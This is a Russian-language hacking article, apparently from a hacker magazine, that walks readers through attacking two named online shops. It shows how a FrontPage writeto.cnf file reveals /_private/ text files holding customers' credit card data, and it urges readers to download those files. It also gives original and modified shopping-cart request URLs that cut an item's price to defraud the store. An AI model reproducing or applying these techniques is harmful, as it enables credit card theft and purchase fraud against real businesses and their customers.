Разбираем дальше уязвимости систем электронной
коммерции. Начнем со сладкого, с сс. Незадачливым администраторам интернет-магазинов уже давно следовало бы понять,
что файлам хранящим критическую информацию (пароли, номера кредитных карт и
т.д.) совсем не место в открытых для всеобщего просмотра веб-директориях, даже
если об этих файлах никто кроме самого админа не знает.
Примером такого головотяпства является www.swimmingcoach.org,
администратор которого хранит данные о кредитных карточках ничего не
подозревающих своих клиентов в текстовых файлах директории /_private/, в полной
уверенности в том что о их существовании знает только он один. Так бы и было бы,
если бы не всеми любимый Microsoft, со своим величайшим творением всех времен и
народов - FrontPage, который сыграл в этом случае злую шутку. Ее смысл в том,
что в некоторых файлах FrontPage хранит информацию о всех файлах веб-сервера, и
что самое главное - файлах в которые выводятся и сохраняются результаты
обработки данных. Одним из таких файлов является writeto.cnf, расположенный как
правило в http://www.xxx.org/_vti_pvt/writeto.cnf. Вот какую информацию он предоставляет
(пример скачан с сервера www.swimmingcoach.org, менно
скачан, в браузере ты его не откроешь):
_private/sic7result.txt: collegesTiJimming/sicS.htm fpdb:global.asa
collegesTiJimming/sicS.asp salary.asp
_private/Jobsvc_net.txt:jobservice/ job_net_questions.htm
_private/audio_sales.txt: worldclinic/ASCA99/asca99_audio.htm
_private/survey.txt:jobservice/salary.htm _private/Mc2000_registration. txt:
Tijorldclinic/asca2000/asca2000_packets . htm
_private/form_results.txt: jobservice/02salary.htm
_private/article_results.txt: ALTST/past_articles/altst_4.htm ALTST/past_artide;
pbsurvey.txt:water_depth_rule_ questionnaire.asp
_private/cert_up.txt:forms/ certupgrade.htm
_private/Mcreg2002_results.txt: worldclinic/ASCA2002/registration2.htm worldclin:
_private/emembers.txt:articles/9903/ 9903-4.htm articles/9903/9903-5.htm
article;j _private/jobsvc_net.txt: jobservice/job_net_questions.htm
_private/certificaion_orders.txt: ASCA_Catalog/certification_0rder.htm
_private/ameridome_leads.txt: ameridome/ordering.htm
_private/feedbackl.txt:forms/feedback.htm
_private/bkcatalog.txt:ASCA_Catalog/ catalog.htm ASCA_Catalog/images/catalog.htm
_private/wc2000_Registration.txt: worldclinic/ ASCA2000/asca2000_packets.htm
_private/sicSresult.txt:sicS/default.htm
_private/sescc_reg.txt:forms/ STiJscc_reg.htm
_private/chevron.txt:forms/ chevform.htm
_private/sicord.txt:ASCA_ Catalog/sicord.htm
_private/samonth.txt:forms/samonth.htm
_private/altst_jоin.txt:ALTST/ ALTST_Join.htm learning_center:global.asa
SurvivalKIT:survivalkit.asp
Как ты видишь, результаты выводятся в
текстовые файлы emembers.txt, survey.txt, sicSresult.txt
лежащие в директории /_private/. Остается всего
лишь открыть их в браузере и сохранить те, в
которых лежат кредитки. Кроме этого, ту
же информацию можно получить и из
другого файла на этом сервере author.log,
расположенного в директории /_vti_log/. Он
большой, так что придется запастись
терпением.
Следующим сайтом, который подвергнется
нашему разбору, будет www.maledicta.com.
В одной из прошлых статей мы говорили о
манипуляции ценой в торговых тележках.
www.maledicta.com дает нам еще один пример такого
действия. Скрипт тележки quikstore.cgi (в прошлом
бажный) в данном случае обрабатывает
запросы методом POST, так что для изменения
цены товара придется воспользоваться
утилитой Achilles, скачать которую ты можешь с
нашего сайта lwb57.webmen.ru.
С ее помощью ты увидишь строку запроса вот
такого вида:
item-BEQUGODU%7C14.95%7CEquinox+of+the+ Gods%7CNA%7CNA=1&store_type=html&page=
crowley.html&add_to_cart.x=45&add_to_cart.y=14
конечно в том случае если выберешь книгу
Алистера Кроули (Сrowley), на мой взгляд
единственного мистика, достойного
прочтения.
Как ты наверное уже успел заметить, цена
товара передается в строке запроса -
"14.95", с помощью Achilles ты можешь теперь
ее изменить и передать серверу. А можешь
просто передать запрос в строке браузера.
Так выглядит изначальный запрос:
http://www.maledicta.com/cgi-bin/quikstore.cgi?item-
BEQUGODU%7C14.95%7CEquinox+of+the+Gods% 7CNA%7CNA=1&store_type=html&page=crowley.
html&add_to_cart.x=45&add_to_cart.y=14
А так модифицированный:
http://www.maledicta.com/cgi-bin/quikstore.cgi?item-
BEQUGODU%7C0.95%7CEquinox+of+the+Gods% 7CNA%7CNA=1&store_type=html&page=crowley.
html&add_to_cart.x=45&add_to_cart.y=14
Приятных чтений на ночь ;-).
Eat The Rich!
